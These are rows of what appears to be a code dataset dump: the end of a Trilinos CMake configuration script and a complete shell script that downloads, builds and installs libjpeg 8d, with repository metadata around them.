-D Trilinos_ENABLE_ALL_OPTIONAL_PACKAGES=OFF
-D Trilinos_ASSERT_MISSING_PACKAGES=OFF
-D Trilinos_ENABLE_TESTS=OFF
-D Trilinos_ENABLE_EXAMPLES=OFF
-D Trilinos_ENABLE_Epetra=OFF
-D Trilinos_ENABLE_Intrepid2=ON
-D Trilinos_ENABLE_Kokkos=ON
-D Trilinos_ENABLE_Teuchos=ON
-D Trilinos_ENABLE_Tpetra=ON
)
cmake_cmd="cmake -GNinja ${ARGS[@]} $EXTRA_ARGS ${TRILINOS_DIR}"
source $HOME/.personal/package_configs/postamble
| true
|
132ffc72cc7609c8e1b4eed7f5245f7af25a4750
|
Shell
|
asiekierka/twili
|
/pkgs/libjpeg/build.sh
|
UTF-8
| 239
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/sh -e
VER=8d
test -e jpegsrc.v$VER.tar.gz || wget http://www.ijg.org/files/jpegsrc.v$VER.tar.gz
rm -rf jpeg-$VER;tar -xf jpegsrc.v$VER.tar.gz
cd jpeg-$VER
./configure --prefix=/
make
make DESTDIR=$1 install
cd ..
rm -rf jpeg-$VER
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.